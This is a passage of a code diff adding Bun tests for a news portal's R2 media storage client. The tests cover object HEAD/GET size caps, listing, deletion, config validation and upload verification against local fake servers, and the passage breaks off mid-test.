+  test("headObject: exists=false for a key the fake server reports as missing", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "HEAD") {
+          return new Response(null, { status: 404 });
+        }
+        return new Response("", { status: 404 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`
+      });
+      const result = await client.headObject("missing.jpg");
+      expect(result).toEqual({ ok: true, exists: false });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("headObject: exists=true with the real Content-Length reported by R2", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "HEAD") {
+          return new Response(null, {
+            status: 200,
+            headers: { "content-length": "12345" }
+          });
+        }
+        return new Response("", { status: 200 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`
+      });
+      const result = await client.headObject("present.jpg");
+      expect(result).toEqual({ ok: true, exists: true, sizeBytes: 12345 });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("getObject: returns the real bytes read from R2 (a full GET, not a HEAD), within maxBytes", async () => {
+    const payload = new TextEncoder().encode("fake jpeg bytes");
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "HEAD") {
+          return new Response(null, {
+            status: 200,
+            headers: { "content-length": String(payload.byteLength) }
+          });
+        }
+        if (request.method === "GET") {
+          return new Response(payload, { status: 200 });
+        }
+        return new Response("", { status: 404 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`
+      });
+      const result = await client.getObject("present.jpg", 1_000_000);
+      expect(result).toEqual({
+        ok: true,
+        sizeExceeded: false,
+        bytes: payload
+      });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("getObject: an object swapped for something huge between HEAD and GET is reported as sizeExceeded", async () => {
+    const CHUNK_SIZE = 256;
+    const MAX_BYTES = 1_000; // deliberately small
+    // Finite but well over MAX_BYTES — large enough to prove the size cap
+    // is enforced against the real bytes read (not `HEAD`'s stale report),
+    // while staying finite so the fake server terminates the response on
+    // its own. (A `pull()` that enqueues forever without ever closing is
+    // NOT a valid test source here: a `ReadableStream` whose producer never
+    // yields/closes can starve the underlying HTTP response's own framing,
+    // hanging `fetch`/`S3Client` before the first byte is ever delivered —
+    // that is a pathological test-server bug, not a property of the client
+    // code under test. The deterministic `readCappedStream` unit test below
+    // is what proves the abort-before-fully-buffering property; this test
+    // only needs to prove the real `Bun.S3Client` pathway threads `maxBytes`
+    // through and reports `sizeExceeded` for a real oversized HTTP response.)
+    const TOTAL_CHUNKS = 64; // 16,384 bytes, >> MAX_BYTES
+    const chunk = new Uint8Array(CHUNK_SIZE).fill(0x41);
+
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "HEAD") {
+          // The attacker scenario: HEAD (taken moments earlier, or simply
+          // stale) reports a small, in-bounds size...
+          return new Response(null, {
+            status: 200,
+            headers: { "content-length": String(MAX_BYTES) }
+          });
+        }
+
+        if (request.method === "GET") {
+          // ...but the GET body actually is far bigger than MAX_BYTES
+          // (simulating an object swapped to be huge between HEAD and GET,
+          // or simply larger than HEAD claimed).
+          let sent = 0;
+          const stream = new ReadableStream<Uint8Array>({
+            pull(controller) {
+              if (sent >= TOTAL_CHUNKS) {
+                controller.close();
+                return;
+              }
+              sent += 1;
+              controller.enqueue(chunk);
+            }
+          });
+          return new Response(stream, { status: 200 });
+        }
+
+        return new Response("", { status: 404 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`,
+        timeoutMs: 5000
+      });
+
+      const result = await client.getObject("huge.jpg", MAX_BYTES);
+
+      expect(result).toEqual({ ok: true, sizeExceeded: true });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("headObject: a provider error (not a clean 404) trips the circuit breaker after repeated failures", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch() {
+        return new Response("simulated outage", { status: 500 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`,
+        timeoutMs: 2000
+      });
+
+      let lastResult;
+      for (let i = 0; i < 6; i += 1) {
+        lastResult = await client.headObject("whatever.jpg");
+      }
+
+      expect(lastResult?.ok).toBe(false);
+    } finally {
+      server.stop(true);
+    }
+  });
+});
+
+describe("createNewsMediaR2Client listObjects/deleteObject (Issue #690)", () => {
+  function xmlListResponse(options: {
+    contents: { key: string; size: number; lastModified: string }[];
+    isTruncated?: boolean;
+    nextContinuationToken?: string;
+  }): string {
+    const entries = options.contents
+      .map(
+        (entry) =>
+          `<Contents><Key>${entry.key}</Key><LastModified>${entry.lastModified}</LastModified><Size>${entry.size}</Size></Contents>`
+      )
+      .join("");
+
+    return `<?xml version="1.0" encoding="UTF-8"?>
+<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
+  <Name>test-bucket</Name>
+  <KeyCount>${options.contents.length}</KeyCount>
+  <MaxKeys>1000</MaxKeys>
+  <IsTruncated>${options.isTruncated ?? false}</IsTruncated>
+  ${options.nextContinuationToken ? `<NextContinuationToken>${options.nextContinuationToken}</NextContinuationToken>` : ""}
+  ${entries}
+</ListBucketResult>`;
+  }
+
+  test("listObjects: returns the real key/size/lastModified metadata reported by R2", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "GET") {
+          return new Response(
+            xmlListResponse({
+              contents: [
+                {
+                  key: "news-media/tenant-1/2026/07/aaa.jpg",
+                  size: 1234,
+                  lastModified: "2026-07-01T00:00:00.000Z"
+                }
+              ]
+            }),
+            { status: 200, headers: { "content-type": "application/xml" } }
+          );
+        }
+        return new Response("", { status: 404 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`
+      });
+      const result = await client.listObjects({
+        prefix: "news-media/tenant-1/"
+      });
+
+      expect(result).toEqual({
+        ok: true,
+        objects: [
+          {
+            key: "news-media/tenant-1/2026/07/aaa.jpg",
+            sizeBytes: 1234,
+            lastModified: "2026-07-01T00:00:00.000Z"
+          }
+        ],
+        isTruncated: false,
+        nextContinuationToken: undefined
+      });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("listObjects: pagination — isTruncated=true carries a nextContinuationToken", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        const url = new URL(request.url);
+        const token = url.searchParams.get("continuation-token");
+
+        if (!token) {
+          return new Response(
+            xmlListResponse({
+              contents: [
+                {
+                  key: "a.jpg",
+                  size: 1,
+                  lastModified: "2026-07-01T00:00:00.000Z"
+                }
+              ],
+              isTruncated: true,
+              nextContinuationToken: "page-2"
+            }),
+            { status: 200, headers: { "content-type": "application/xml" } }
+          );
+        }
+
+        return new Response(
+          xmlListResponse({
+            contents: [
+              {
+                key: "b.jpg",
+                size: 2,
+                lastModified: "2026-07-02T00:00:00.000Z"
+              }
+            ],
+            isTruncated: false
+          }),
+          { status: 200, headers: { "content-type": "application/xml" } }
+        );
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`
+      });
+
+      const page1 = await client.listObjects({ prefix: "", maxKeys: 1 });
+      expect(page1).toEqual({
+        ok: true,
+        objects: [
+          {
+            key: "a.jpg",
+            sizeBytes: 1,
+            lastModified: "2026-07-01T00:00:00.000Z"
+          }
+        ],
+        isTruncated: true,
+        nextContinuationToken: "page-2"
+      });
+
+      const page2 = await client.listObjects({
+        prefix: "",
+        maxKeys: 1,
+        continuationToken: (page1 as { nextContinuationToken?: string })
+          .nextContinuationToken
+      });
+      expect(page2).toEqual({
+        ok: true,
+        objects: [
+          {
+            key: "b.jpg",
+            sizeBytes: 2,
+            lastModified: "2026-07-02T00:00:00.000Z"
+          }
+        ],
+        isTruncated: false,
+        nextContinuationToken: undefined
+      });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("listObjects: a provider error (5xx) trips the circuit breaker after repeated failures", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch() {
+        return new Response("simulated outage", { status: 500 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`,
+        timeoutMs: 2000
+      });
+
+      let lastResult;
+      for (let i = 0; i < 6; i += 1) {
+        lastResult = await client.listObjects({ prefix: "news-media/" });
+      }
+
+      expect(lastResult?.ok).toBe(false);
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("listObjects: retry after a transient failure succeeds (simulated R2 API failure then success)", async () => {
+    let callCount = 0;
+    const server = Bun.serve({
+      port: 0,
+      fetch() {
+        callCount += 1;
+        if (callCount === 1) {
+          return new Response("simulated transient outage", { status: 500 });
+        }
+        return new Response(
+          xmlListResponse({
+            contents: [
+              {
+                key: "a.jpg",
+                size: 1,
+                lastModified: "2026-07-01T00:00:00.000Z"
+              }
+            ]
+          }),
+          { status: 200, headers: { "content-type": "application/xml" } }
+        );
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`,
+        timeoutMs: 2000
+      });
+
+      const first = await client.listObjects({ prefix: "" });
+      expect(first.ok).toBe(false);
+
+      const second = await client.listObjects({ prefix: "" });
+      expect(second.ok).toBe(true);
+      if (second.ok) {
+        expect(second.objects).toHaveLength(1);
+      }
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("deleteObject: succeeds against a real 204 response", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "DELETE") {
+          return new Response(null, { status: 204 });
+        }
+        return new Response("", { status: 404 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`
+      });
+
+      const result = await client.deleteObject("news-media/tenant-1/x.jpg");
+      expect(result).toEqual({ ok: true });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("deleteObject: a real provider error is reported as ok:false, never thrown", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "DELETE") {
+          return new Response("simulated outage", { status: 500 });
+        }
+        return new Response("", { status: 404 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`,
+        timeoutMs: 2000
+      });
+
+      const result = await client.deleteObject("news-media/tenant-1/x.jpg");
+      expect(result.ok).toBe(false);
+    } finally {
+      server.stop(true);
+    }
+  });
+});
+
+describe("readCappedStream (Issue #634, PR #653 security-auditor Critical fix)", () => {
+  test("stops reading and cancels the source stream as soon as maxBytes is exceeded — never accumulates more than maxBytes worth of chunks", async () => {
+    const CHUNK_SIZE = 100;
+    const MAX_BYTES = 350; // exceeded partway through the 4th chunk
+    let pullCount = 0;
+    let cancelled = false;
+    let cancelReason: unknown;
+
+    const stream = new ReadableStream<Uint8Array>({
+      pull(controller) {
+        pullCount += 1;
+        // Never terminates on its own — an infinite source. If
+        // `readCappedStream` did not abort, this test would hang until
+        // Bun's own test timeout kills it.
+        controller.enqueue(new Uint8Array(CHUNK_SIZE).fill(pullCount));
+      },
+      cancel(reason) {
+        cancelled = true;
+        cancelReason = reason;
+      }
+    });
+
+    const result = await readCappedStream(stream, MAX_BYTES);
+
+    expect(result).toBeNull();
+    // 4 chunks = 400 bytes > 350 triggers the abort on the 4th read; a 5th
+    // chunk is never requested/consumed.
+    expect(pullCount).toBe(4);
+    expect(cancelled).toBe(true);
+    expect(typeof cancelReason).toBe("string");
+  });
+
+  test("returns the exact concatenated bytes when the stream stays within maxBytes", async () => {
+    const parts = [
+      new Uint8Array([1, 2, 3]),
+      new Uint8Array([4, 5]),
+      new Uint8Array([6])
+    ];
+    let index = 0;
+
+    const stream = new ReadableStream<Uint8Array>({
+      pull(controller) {
+        if (index >= parts.length) {
+          controller.close();
+          return;
+        }
+        controller.enqueue(parts[index]!);
+        index += 1;
+      }
+    });
+
+    const result = await readCappedStream(stream, 100);
+
+    expect(result).toEqual(new Uint8Array([1, 2, 3, 4, 5, 6]));
+  });
+});

--- a/tests/news-media-r2-config.test.ts
+++ b/tests/news-media-r2-config.test.ts
@@ -1,0 +1,390 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  allowsSvgMimeType,
+  findMissingNewsMediaR2Vars,
+  findNewsMediaR2PublicBaseUrlProductionUnsafeReason,
+  findNewsMediaR2SeparationViolations,
+  findUnknownNewsMediaR2MimeTypes,
+  isNewsMediaR2Enabled,
+  isOrphanGraceTooShort,
+  isPresignedUploadTtlTooLong,
+  NEWS_MEDIA_R2_DEFAULTS,
+  NEWS_MEDIA_R2_MAX_PRESIGNED_UPLOAD_TTL_SECONDS,
+  NEWS_MEDIA_R2_MIN_ORPHAN_GRACE_DAYS,
+  NEWS_MEDIA_R2_REQUIRED_WHEN_ENABLED,
+  resolveNewsMediaR2Config
+} from "../src/modules/news-portal/domain/news-media-r2-config";
+
+describe("resolveNewsMediaR2Config", () => {
+  test("defaults to disabled with empty credential fields when env is empty", () => {
+    const config = resolveNewsMediaR2Config({} as NodeJS.ProcessEnv);
+
+    expect(config.enabled).toBe(false);
+    expect(config.accountId).toBe("");
+    expect(config.accessKeyId).toBe("");
+    expect(config.secretAccessKey).toBe("");
+    expect(config.bucket).toBe("");
+    expect(config.publicBaseUrl).toBe("");
+    expect(config.presignedUploadTtlSeconds).toBe(
+      NEWS_MEDIA_R2_DEFAULTS.presignedUploadTtlSeconds
+    );
+    expect(config.maxUploadBytes).toBe(NEWS_MEDIA_R2_DEFAULTS.maxUploadBytes);
+    expect(config.allowedMimeTypes).toEqual(
+      NEWS_MEDIA_R2_DEFAULTS.allowedMimeTypes
+    );
+    expect(config.pendingTtlMinutes).toBe(
+      NEWS_MEDIA_R2_DEFAULTS.pendingTtlMinutes
+    );
+    expect(config.orphanGraceDays).toBe(NEWS_MEDIA_R2_DEFAULTS.orphanGraceDays);
+  });
+
+  test("parses a fully-configured enabled env", () => {
+    const config = resolveNewsMediaR2Config({
+      NEWS_MEDIA_R2_ENABLED: "true",
+      NEWS_MEDIA_R2_ACCOUNT_ID: "acct-news",
+      NEWS_MEDIA_R2_ACCESS_KEY_ID: "news-key",
+      NEWS_MEDIA_R2_SECRET_ACCESS_KEY: "news-secret",
+      NEWS_MEDIA_R2_BUCKET: "news-media-bucket",
+      NEWS_MEDIA_R2_PUBLIC_BASE_URL: "https://media.example.test",
+      NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS: "120",
+      NEWS_MEDIA_R2_MAX_UPLOAD_BYTES: "2048",
+      NEWS_MEDIA_R2_ALLOWED_MIME_TYPES: "image/jpeg, image/png",
+      NEWS_MEDIA_R2_PENDING_TTL_MINUTES: "15",
+      NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS: "45"
+    } as NodeJS.ProcessEnv);
+
+    expect(config).toEqual({
+      enabled: true,
+      accountId: "acct-news",
+      accessKeyId: "news-key",
+      secretAccessKey: "news-secret",
+      bucket: "news-media-bucket",
+      publicBaseUrl: "https://media.example.test",
+      presignedUploadTtlSeconds: 120,
+      maxUploadBytes: 2048,
+      allowedMimeTypes: ["image/jpeg", "image/png"],
+      pendingTtlMinutes: 15,
+      orphanGraceDays: 45
+    });
+  });
+
+  test("falls back to defaults for malformed numeric values", () => {
+    const config = resolveNewsMediaR2Config({
+      NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS: "not-a-number",
+      NEWS_MEDIA_R2_MAX_UPLOAD_BYTES: "-5",
+      NEWS_MEDIA_R2_PENDING_TTL_MINUTES: "0",
+      NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS: "not-a-number"
+    } as NodeJS.ProcessEnv);
+
+    expect(config.presignedUploadTtlSeconds).toBe(
+      NEWS_MEDIA_R2_DEFAULTS.presignedUploadTtlSeconds
+    );
+    expect(config.maxUploadBytes).toBe(NEWS_MEDIA_R2_DEFAULTS.maxUploadBytes);
+    expect(config.pendingTtlMinutes).toBe(
+      NEWS_MEDIA_R2_DEFAULTS.pendingTtlMinutes
+    );
+    expect(config.orphanGraceDays).toBe(NEWS_MEDIA_R2_DEFAULTS.orphanGraceDays);
+  });
+});
+
+describe("isNewsMediaR2Enabled", () => {
+  test("false by default", () => {
+    expect(isNewsMediaR2Enabled({} as NodeJS.ProcessEnv)).toBe(false);
+  });
+
+  test("true only for the literal string 'true'", () => {
+    expect(
+      isNewsMediaR2Enabled({
+        NEWS_MEDIA_R2_ENABLED: "true"
+      } as NodeJS.ProcessEnv)
+    ).toBe(true);
+    expect(
+      isNewsMediaR2Enabled({
+        NEWS_MEDIA_R2_ENABLED: "TRUE"
+      } as NodeJS.ProcessEnv)
+    ).toBe(false);
+  });
+});
+
+describe("findMissingNewsMediaR2Vars", () => {
+  test("empty when disabled, regardless of what else is set", () => {
+    expect(findMissingNewsMediaR2Vars({} as NodeJS.ProcessEnv)).toEqual([]);
+  });
+
+  test("lists every required var missing when enabled with nothing else set", () => {
+    expect(
+      findMissingNewsMediaR2Vars({
+        NEWS_MEDIA_R2_ENABLED: "true"
+      } as NodeJS.ProcessEnv)
+    ).toEqual([...NEWS_MEDIA_R2_REQUIRED_WHEN_ENABLED]);
+  });
+
+  test("empty when enabled and fully configured", () => {
+    expect(
+      findMissingNewsMediaR2Vars({
+        NEWS_MEDIA_R2_ENABLED: "true",
+        NEWS_MEDIA_R2_ACCOUNT_ID: "a",
+        NEWS_MEDIA_R2_ACCESS_KEY_ID: "b",
+        NEWS_MEDIA_R2_SECRET_ACCESS_KEY: "c",
+        NEWS_MEDIA_R2_BUCKET: "d",
+        NEWS_MEDIA_R2_PUBLIC_BASE_URL: "https://media.example.test"
+      } as NodeJS.ProcessEnv)
+    ).toEqual([]);
+  });
+});
+
+describe("findNewsMediaR2SeparationViolations — Keputusan kunci #1", () => {
+  test("no violation when neither sync-storage R2 var nor news-media R2 var is set", () => {
+    expect(
+      findNewsMediaR2SeparationViolations({} as NodeJS.ProcessEnv)
+    ).toEqual([]);
+  });
+
+  test("no violation when only one side is set (nothing to collide with)", () => {
+    expect(
+      findNewsMediaR2SeparationViolations({
+        NEWS_MEDIA_R2_BUCKET: "news-bucket"
+      } as NodeJS.ProcessEnv)
+    ).toEqual([]);
+  });
+
+  test("no violation when both sides are set but genuinely different", () => {
+    expect(
+      findNewsMediaR2SeparationViolations({
+        R2_BUCKET: "sync-bucket",
+        R2_ACCESS_KEY_ID: "sync-key",
+        R2_SECRET_ACCESS_KEY: "sync-secret",
+        NEWS_MEDIA_R2_BUCKET: "news-bucket",
+        NEWS_MEDIA_R2_ACCESS_KEY_ID: "news-key",
+        NEWS_MEDIA_R2_SECRET_ACCESS_KEY: "news-secret"
+      } as NodeJS.ProcessEnv)
+    ).toEqual([]);
+  });
+
+  test("flags a shared bucket", () => {
+    expect(
+      findNewsMediaR2SeparationViolations({
+        R2_BUCKET: "same-bucket",
+        NEWS_MEDIA_R2_BUCKET: "same-bucket"
+      } as NodeJS.ProcessEnv)
+    ).toEqual(["bucket_shared_with_sync_r2"]);
+  });
+
+  test("flags a shared access key id and secret access key independently", () => {
+    expect(
+      findNewsMediaR2SeparationViolations({
+        R2_ACCESS_KEY_ID: "same-key",
+        NEWS_MEDIA_R2_ACCESS_KEY_ID: "same-key",
+        R2_SECRET_ACCESS_KEY: "same-secret",
+        NEWS_MEDIA_R2_SECRET_ACCESS_KEY: "same-secret"
+      } as NodeJS.ProcessEnv)
+    ).toEqual([
+      "access_key_id_shared_with_sync_r2",
+      "secret_access_key_shared_with_sync_r2"
+    ]);
+  });
+});
+
+describe("allowsSvgMimeType", () => {
+  test("false for the default allow-list", () => {
+    expect(allowsSvgMimeType({} as NodeJS.ProcessEnv)).toBe(false);
+  });
+
+  test("true only when an operator explicitly overrides the allow-list to include it", () => {
+    expect(
+      allowsSvgMimeType({
+        NEWS_MEDIA_R2_ALLOWED_MIME_TYPES: "image/jpeg,image/svg+xml"
+      } as NodeJS.ProcessEnv)
+    ).toBe(true);
+  });
+});
+
+describe("findUnknownNewsMediaR2MimeTypes (Issue #635)", () => {
+  test("empty when disabled, regardless of the allow-list value", () => {
+    expect(
+      findUnknownNewsMediaR2MimeTypes({
+        NEWS_MEDIA_R2_ALLOWED_MIME_TYPES: "text/html"
+      } as NodeJS.ProcessEnv)
+    ).toEqual([]);
+  });
+
+  test("empty for the default allow-list", () => {
+    expect(
+      findUnknownNewsMediaR2MimeTypes({
+        NEWS_MEDIA_R2_ENABLED: "true"
+      } as NodeJS.ProcessEnv)
+    ).toEqual([]);
+  });
+
+  test("empty when the allow-list is deliberately overridden to include image/svg+xml (a known, if disallowed-by-default, type)", () => {
+    expect(
+      findUnknownNewsMediaR2MimeTypes({
+        NEWS_MEDIA_R2_ENABLED: "true",
+        NEWS_MEDIA_R2_ALLOWED_MIME_TYPES: "image/jpeg,image/svg+xml"
+      } as NodeJS.ProcessEnv)
+    ).toEqual([]);
+  });
+
+  test("flags entries the MIME sniffer could never recognize (misconfiguration, not just unsafe)", () => {
+    expect(
+      findUnknownNewsMediaR2MimeTypes({
+        NEWS_MEDIA_R2_ENABLED: "true",
+        NEWS_MEDIA_R2_ALLOWED_MIME_TYPES:
+          "image/jpeg,text/html,application/octet-stream"
+      } as NodeJS.ProcessEnv)
+    ).toEqual(["text/html", "application/octet-stream"]);
+  });
+});
+
+describe("isPresignedUploadTtlTooLong (Issue #635)", () => {
+  test("false when disabled, regardless of the TTL value", () => {
+    expect(
+      isPresignedUploadTtlTooLong({
+        NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS: "999999"
+      } as NodeJS.ProcessEnv)
+    ).toBe(false);
+  });
+
+  test("false for the default TTL", () => {
+    expect(
+      isPresignedUploadTtlTooLong({
+        NEWS_MEDIA_R2_ENABLED: "true"
+      } as NodeJS.ProcessEnv)
+    ).toBe(false);
+  });
+
+  test("false exactly at the maximum", () => {
+    expect(
+      isPresignedUploadTtlTooLong({
+        NEWS_MEDIA_R2_ENABLED: "true",
+        NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS: String(
+          NEWS_MEDIA_R2_MAX_PRESIGNED_UPLOAD_TTL_SECONDS
+        )
+      } as NodeJS.ProcessEnv)
+    ).toBe(false);
+  });
+
+  test("true just above the maximum", () => {
+    expect(
+      isPresignedUploadTtlTooLong({
+        NEWS_MEDIA_R2_ENABLED: "true",
+        NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS: String(
+          NEWS_MEDIA_R2_MAX_PRESIGNED_UPLOAD_TTL_SECONDS + 1
+        )
+      } as NodeJS.ProcessEnv)
+    ).toBe(true);
+  });
+});
+
+describe("isOrphanGraceTooShort (Issue #690)", () => {
+  test("false when disabled, regardless of the grace value", () => {
+    expect(
+      isOrphanGraceTooShort({
+        NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS: "1"
+      } as NodeJS.ProcessEnv)
+    ).toBe(false);
+  });
+
+  test("false for the default grace period", () => {
+    expect(
+      isOrphanGraceTooShort({
+        NEWS_MEDIA_R2_ENABLED: "true"
+      } as NodeJS.ProcessEnv)
+    ).toBe(false);
+  });
+
+  test("false exactly at the minimum", () => {
+    expect(
+      isOrphanGraceTooShort({
+        NEWS_MEDIA_R2_ENABLED: "true",
+        NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS: String(
+          NEWS_MEDIA_R2_MIN_ORPHAN_GRACE_DAYS
+        )
+      } as NodeJS.ProcessEnv)
+    ).toBe(false);
+  });
+
+  test("true just below the minimum", () => {
+    expect(
+      isOrphanGraceTooShort({
+        NEWS_MEDIA_R2_ENABLED: "true",
+        NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS: String(
+          NEWS_MEDIA_R2_MIN_ORPHAN_GRACE_DAYS - 1
+        )
+      } as NodeJS.ProcessEnv)
+    ).toBe(true);
+  });
+});
+
+describe("findNewsMediaR2PublicBaseUrlProductionUnsafeReason (Issue #635)", () => {
+  test("null for a real custom domain", () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason(
+        "https://media.example.com"
+      )
+    ).toBeNull();
+  });
+
+  test('"r2_dev_default_domain" for Cloudflare\'s default *.r2.dev host', () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason(
+        "https://pub-abc123.r2.dev"
+      )
+    ).toBe("r2_dev_default_domain");
+  });
+
+  test('does not false-positive on a custom domain that merely contains "r2.dev" as a substring elsewhere', () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason(
+        "https://media.example.com/r2.dev-archive"
+      )
+    ).toBeNull();
+  });
+
+  test('"loopback_host" for localhost', () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason(
+        "http://localhost:3000"
+      )
+    ).toBe("loopback_host");
+  });
+
+  test('"loopback_host" for 127.0.0.1', () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason("http://127.0.0.1")
+    ).toBe("loopback_host");
+  });
+
+  test('"loopback_host" for IPv6 ::1 (bracketed URL form)', () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason("http://[::1]")
+    ).toBe("loopback_host");
+  });
+
+  test('"loopback_host" for 0.0.0.0', () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason("http://0.0.0.0")
+    ).toBe("loopback_host");
+  });
+
+  test('"r2_dev_default_domain" for a trailing-dot FQDN variant of *.r2.dev (reviewer + security-auditor finding, PR #665 re-review — DNS treats "abc.r2.dev." identically to "abc.r2.dev", but a naive suffix regex would not)', () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason(
+        "https://pub-abc123.r2.dev./x"
+      )
+    ).toBe("r2_dev_default_domain");
+  });
+
+  test('"loopback_host" for a trailing-dot variant of localhost', () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason("http://localhost.")
+    ).toBe("loopback_host");
+  });
+
+  test('"unparseable_url" for a malformed value', () => {
+    expect(
+      findNewsMediaR2PublicBaseUrlProductionUnsafeReason("not-a-url")
+    ).toBe("unparseable_url");
+  });
+});

--- a/tests/news-media-r2-verification.test.ts
+++ b/tests/news-media-r2-verification.test.ts
@@ -1,0 +1,210 @@
+/**
+ * `verifyNewsMediaR2Object` orchestration (Issue #634) — the exact function
+ * that closes the security-auditor Critical finding on Issue #631: finalize
+ * must do a real `GET` + magic-byte sniffing + server-side checksum, never
+ * `HEAD` alone. Exercised here against a hand-written fake
+ * `NewsMediaR2Client` (the real client against a real fake HTTP server is
+ * covered separately by `news-media-r2-client.test.ts`) so this file stays
+ * focused on the orchestration/decision wiring.
+ */
+import { describe, expect, test } from "bun:test";
+
+import { verifyNewsMediaR2Object } from "../src/modules/news-portal/application/news-media-r2-verification";
+import type {
+  NewsMediaR2Client,
+  NewsMediaR2HeadResult,
+  NewsMediaR2GetResult
+} from "../src/modules/news-portal/infrastructure/news-media-r2-client";
+
+const ALLOWED = ["image/jpeg", "image/png", "image/webp", "image/gif"];
+const MAX_BYTES = 10_485_760;
+
+const JPEG_BYTES = new Uint8Array([
+  0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46
+]);
+
+/** `listObjects`/`deleteObject` (Issue #690) are not exercised by this file's orchestration-only tests — `verifyNewsMediaR2Object` never calls either. */
+function unusedListObjects(): never {
+  throw new Error(
+    "listObjects should not be called by verifyNewsMediaR2Object"
+  );
+}
+function unusedDeleteObject(): never {
+  throw new Error(
+    "deleteObject should not be called by verifyNewsMediaR2Object"
+  );
+}
+
+function fakeClient(overrides: {
+  head?: NewsMediaR2HeadResult;
+  get?: NewsMediaR2GetResult;
+}): NewsMediaR2Client {
+  return {
+    presignUploadUrl: () => "https://example.test/presigned",
+    headObject: async () =>
+      overrides.head ?? {
+        ok: true,
+        exists: true,
+        sizeBytes: JPEG_BYTES.byteLength
+      },
+    getObject: async () =>
+      overrides.get ?? { ok: true, sizeExceeded: false, bytes: JPEG_BYTES },
+    listObjects: unusedListObjects,
+    deleteObject: unusedDeleteObject
+  };
+}
+
+describe("verifyNewsMediaR2Object (Issue #634)", () => {
+  test("HEAD reports missing object -> rejected object_not_found, GET never called", async () => {
+    let getCalled = false;
+    const client: NewsMediaR2Client = {
+      presignUploadUrl: () => "unused",
+      headObject: async () => ({ ok: true, exists: false }),
+      getObject: async () => {
+        getCalled = true;
+        return { ok: true, sizeExceeded: false, bytes: JPEG_BYTES };
+      },
+      listObjects: unusedListObjects,
+      deleteObject: unusedDeleteObject
+    };
+
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result).toEqual({ outcome: "rejected", reason: "object_not_found" });
+    expect(getCalled).toBe(false);
+  });
+
+  test("HEAD reports oversized object -> rejected size_exceeded, GET never called (bandwidth guard, doc §9)", async () => {
+    let getCalled = false;
+    const client: NewsMediaR2Client = {
+      presignUploadUrl: () => "unused",
+      headObject: async () => ({
+        ok: true,
+        exists: true,
+        sizeBytes: MAX_BYTES + 1
+      }),
+      getObject: async () => {
+        getCalled = true;
